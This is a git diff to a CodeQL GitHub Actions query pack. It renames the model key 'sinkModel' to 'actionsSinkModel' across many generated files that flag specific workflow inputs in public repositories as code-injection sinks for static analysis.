--- a/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml +++ b/ql/lib/ext/generated/composite-actions/vesoft-inc_nebula.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vesoft-inc/nebula", "*", "input.target-path", "code-injection", "generated"] - ["vesoft-inc/nebula", "*", "input.bucket", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml index cc8a7f16492d..536b37131c17 100644 --- a/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/composite-actions/vkcom_vkui.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui", "*", "input.next_version", "code-injection", "generated"] - ["vkcom/vkui", "*", "input.package_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml index ec1ed14fed50..54f72118d870 100644 --- a/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml +++ b/ql/lib/ext/generated/composite-actions/vuetifyjs_vuetify.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vuetifyjs/vuetify", "*", "input.name", "code-injection", "generated"] - ["vuetifyjs/vuetify", "*", "input.path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml index 18b37d3c658b..bed9ae53110e 100644 --- a/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml +++ b/ql/lib/ext/generated/composite-actions/wagoodman_dive.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wagoodman/dive", "*", "input.bootstrap-apt-packages", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml index c1699ec6816f..7e9f4e14e857 100644 --- a/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml +++ b/ql/lib/ext/generated/composite-actions/walletconnect_walletconnectswiftv2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/walletconnectswiftv2", "*", "input.js-client-api-host", "code-injection", "generated"] - ["walletconnect/walletconnectswiftv2", "*", "input.project-id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml index 0fe9b73b6deb..3a16fc74bb68 100644 --- a/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml +++ b/ql/lib/ext/generated/composite-actions/wazuh_wazuh.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wazuh/wazuh", "*", "input.target", "code-injection", "generated"] - ["wazuh/wazuh", "*", "input.doxygen_config", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml index 27a5defa298f..686f1013dd81 100644 --- a/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/composite-actions/web-infra-dev_rspack.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack", "*", "input.post", "code-injection", "generated"] - ["web-infra-dev/rspack", "*", "input.profile", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml index 05fd2667812b..6a6cb61c1745 100644 --- a/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml +++ b/ql/lib/ext/generated/composite-actions/webassembly_wabt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["webassembly/wabt", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml index 5a91e3cd32f1..513cd4d76446 100644 --- a/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml +++ b/ql/lib/ext/generated/composite-actions/wntrblm_nox.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wntrblm/nox", "*", "input.python-versions", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml index bb632423a1c5..2855a6d4e01d 100644 --- a/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml +++ b/ql/lib/ext/generated/composite-actions/xrplf_rippled.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["xrplf/rippled", "*", "input.configuration", "code-injection", "generated"] - ["xrplf/rippled", "*", "input.cmake-target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml index dca76acdc27d..78a2cc4e0ced 100644 --- a/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml +++ b/ql/lib/ext/generated/composite-actions/zcash_zcash.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zcash/zcash", "*", "input.destination", "code-injection", "generated"] - ["zcash/zcash", "*", "input.remove-first-if-exists", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml index c0e357715de3..8db73d2fc779 100644 --- a/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/composite-actions/zenml-io_zenml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml", "*", "input.install_integrations", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml index 2bc23972e785..8b0deda070d9 100644 --- a/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml +++ b/ql/lib/ext/generated/composite-actions/zeroc-ice_ice.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zeroc-ice/ice", "*", "input.flags", "code-injection", "generated"] - ["zeroc-ice/ice", "*", "input.make_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml index 740bfd26d695..3f7a7e7fda80 100644 --- a/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/0xpolygon_polygon-edge.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["0xpolygon/polygon-edge/.github/workflows/loadtest.yml", "*", "input.scenario", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml index f3bfa556ee5d..9746a1186913 100644 --- a/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/8vim_8vim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_code", "code-injection", "generated"] - ["8vim/8vim/.github/workflows/publish.yaml", "*", "input.version_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml index f8c4e3c68beb..6208645b1b7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/actions_reusable-workflows.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.base-pr-branch", "code-injection", "generated"] - ["actions/reusable-workflows/.github/workflows/update-config-files.yml", "*", "input.head-pr-branch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml index 793136cc3d3a..e66e7326701e 100644 --- a/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/adap_flower.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.namespace-repository", "code-injection", "generated"] - ["adap/flower/.github/workflows/_docker-build.yml", "*", "input.file-dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml index e46601a7bff0..471ce3a672a9 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_multidict.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/multidict/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml index 558ff908edf1..1af30be9f358 100644 --- a/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aio-libs_yarl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.wheel-tags-to-skip", "code-injection", "generated"] - ["aio-libs/yarl/.github/workflows/reusable-build-wheel.yml", "*", "input.qemu", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml index a477e289d9ef..ee3d9d0a8eff 100644 --- a/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/airbytehq_airbyte.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["airbytehq/airbyte/.github/workflows/connector-performance-command.yml", "*", "input.connector", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml index a72ace81445d..493594e3b81a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_collections.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/collections/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml index 26c0794a19c8..a437581ba83a 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_frontend.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/frontend/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml index 5ad39d5e184f..489e005cc0ec 100644 --- a/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/alphagov_publishing-api.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["alphagov/publishing-api/.github/workflows/pact-verify.yml", "*", "input.pact_artifact_file_to_verify", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml index 3c790f81d747..3a0e723e9f70 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_druid.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.module", "code-injection", "generated"] - ["apache/druid/.github/workflows/reusable-unit-tests.yml", "*", "input.jdk", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml index 50fdcfd5a2d1..893be8a27259 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_flink.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.environment", "code-injection", "generated"] - ["apache/flink/.github/workflows/template.flink-ci.yml", "*", "input.workflow-caller-id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml index 6363564503c9..75877fa48aa7 100644 --- a/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/apache_spark.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.branch", "code-injection", "generated"] - ["apache/spark/.github/workflows/build_and_test.yml", "*", "input.jobs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml index fce736676fea..489e6134eba4 100644 
--- a/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argilla-io_argilla.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argilla-io/argilla/.github/workflows/run-python-tests.yml", "*", "input.pytestArgs", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml index 593322a739eb..4feef931f71e 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-cd/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml index b3984a7ab831..189cd8bbafdc 100644 --- a/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/argoproj_argo-rollouts.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.docker_image_name", "code-injection", "generated"] - ["argoproj/argo-rollouts/.github/workflows/image-reuse.yaml", "*", "input.ghcr_image_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml index a6f1bd4569db..418694a596d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/aws-amplify_amplify-ui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["aws-amplify/amplify-ui/.github/workflows/reusable-tagged-publish.yml", "*", "input.dist-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml index b661a1fa26aa..10c4f8a3e3c3 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_apiops.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/apiops/tools/github_workflows/run-publisher-with-env.yaml", "*", "input.API_MANAGEMENT_SERVICE_OUTPUT_FOLDER_PATH", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml index 0f58971041d4..1837a505499e 100644 --- a/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/azure_mlops-templates.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["azure/mlops-templates/.github/workflows/tf-gha-install-terraform.yml", "*", "input.terraform_workingdir", "code-injection", "generated"] - ["azure/mlops-templates/.github/workflows/run-pipeline.yml", "*", "input.parameters-file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml index f12a337d71dd..094e4602e8e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_avocaddo-cmw.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/avocaddo-cmw/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml index 76796b4ae383..ec264f96bf16 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-email", "code-injection", "generated"] - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "input.git-user-name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml index 8cc08edff5d6..7463396b1522 100644 --- a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.shell", "code-injection", "generated"] - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "input.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml index c2963eb76f45..4c52a10d4f1d 100644 --- a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml index 66aea90b41a6..a6c5a8b8e3bc 100644 --- a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml index 49ed7bca899b..286e75fc9e20 100644 --- a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.REGISTRY", "code-injection", "generated"] - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "input.IMAGE_NAME", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml index fd0a2d9110a9..9ea5a9a34c70 100644 --- a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "input.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml index 1a3bdd1b3803..34e41e9c589d 100644 
--- a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.the_path", "code-injection", "generated"] - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "input.last_commit", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml index 6185f9d03d05..cc38156973bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.destination-tag", "code-injection", "generated"] - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "input.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml index 273bbc695405..748287e75f82 100644 --- a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cemu-project/cemu/.github/workflows/build.yml", "*", "input.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml index 3aac3af3cae6..703a138d28d7 100644 --- a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.unreal-program-name", "code-injection", "generated"] - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "input.test-package-base-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml index 9887b8e5f3ae..97f1bafd1f38 100644 --- a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["cgal/cgal/.github/workflows/send_email.yml", "*", "input.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml index 4c6379fd94b1..064c946363f7 100644 --- a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml 
